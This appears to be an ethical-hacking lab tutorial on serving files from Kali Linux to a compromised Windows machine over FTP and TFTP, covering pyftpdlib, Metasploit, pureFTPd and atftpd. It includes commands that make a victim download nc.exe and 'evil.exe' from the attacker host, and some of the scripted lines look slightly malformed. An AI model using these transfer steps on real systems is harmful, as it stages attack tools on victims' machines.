Post exploitation, moving files from Kali Linux to a remote victim machine can be critical to the next steps. Privilege escalation can be made significantly easier by automatic exploit suggesters and other great binaries and scripts. The problem is what happens when you cant use wget on the victim machine or the only attack surface is a vulnerable web application that is vulnerable to SQL injected ftp commands? This is the Post-Exploit Guide: Use FTP in Kali Linux to Move Files.
- Use pureFTPd
- Use Metasploit’s FTP server module
- Use Python’s pyftpdlib
- Use Kali’s atftpd Trivial FTP Server
Table of Contents
Here’s What You Need
- Kali Linux Virtual Machine (VirtualBox)
- Windows Client (VirtualBox)
Serving up files can depend on what’s available on the remote host. Living off the land is the way to live in the world of ethical hacking. Well it so happens that the ftp client comes installed by default on Windows. It’s using it to get files from what you have got running on the Kali machine that requires some engineering steps to be taken.
That is why I use the tools already installed on Windows whenever possible. On Windows XP machines trivial ftp is installed by default. This is called by tftp in a terminal. The benefits are that it is non interactive, making it easier to use remotely when dealing with authentication. Even as an anonymous user with read access.
Setting up the virtual machines in VirtualBox requires a few easy steps. My usual setup involves creating a host only network adapter with the DHCP Server enabled. Additionally I attach a NAT network adapter, which I can switch to to get internet access.
Python’s pyftplib Module
Just as I can run a simple HTTP server using the syntax python -m SimpleHTTPServer [serving-port], this also works for the new FTP module. In the same vein, any files I want to server up via FTP will be served in the directory I run the module from.
# install the module
apt-get install python-pyftpdlib
# start the server on port 21
python -m pyftpdlib -p 21By default anonymous access is allowed by the new Python FTP server. Additionally adding the -w flag grants anonymous users write access.
The problem is that this option is interactive and that makes passive exploiting difficult.
echo ftp 10.0.2.17 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo get nc.exe >> ftp.txt
echo ftp -s:ftp.txtMetasploit FTP Server Module
$ msfconsole
$ use auxiliary/server/ftp
$ set SRVHOST 10.0.2.17
$ set SRVROOT /dir-where-files-are
Running the Metasploit ftp server binds the service to port 21, so in order to kill the background service run jobs -k [job id].
Here’s what the request looks like in Wireshark.
PureFTPd
I found an excellent guide for using the pureFTPd service from fuzzy security.
$ apt-get install pure-ftpd
$ groupadd ftpusers
$ useradd -g ftpusers -d /dev/null -s /etc ftp-user
$ mkdir /root/ftp
$ pure-pw useradd bob -u ftp-user -g ftpusers -d /root/ftp/
$ chown -R ftp-user:ftpusers /root/ftp
$cd /etc/pure-ftpd/auth
$ ln -s ../conf/PureDB 60pdbWindows TFTP Client
By default the tftp service is installed in Windows Vista and above, but it needs to be enabled. Go to Control panel > Programs and features > Turn Windows features on or off to turn on the TFTP client.
Now on the Kali machine I need to start up the atftpd service.
# I start the service
$ service atftpd start
# create dir to serve payload
$ mkdir /tftphome
# need to change some config settings
$ nano /etc/atftpd
# restart the service
$ /etc/init.d/atftpd restart
And finally on the Windows client run these.
C:\tftp -i 10.0.2.17 GET evil.exeConclusion:
I show how to serve up files from Kali Linux virtual machine using several methods including Python’s pyftpdlib, the pureFTPd service, and by Metasploit’s built in ftp server. The way around navigating the choosing of these different options, I explain, is to identify the one that allows anonymous access. This is critical in getting remote ftp commands to execute flawlessly in an interactive ftp client. Such a client is the one installed by default on Windows.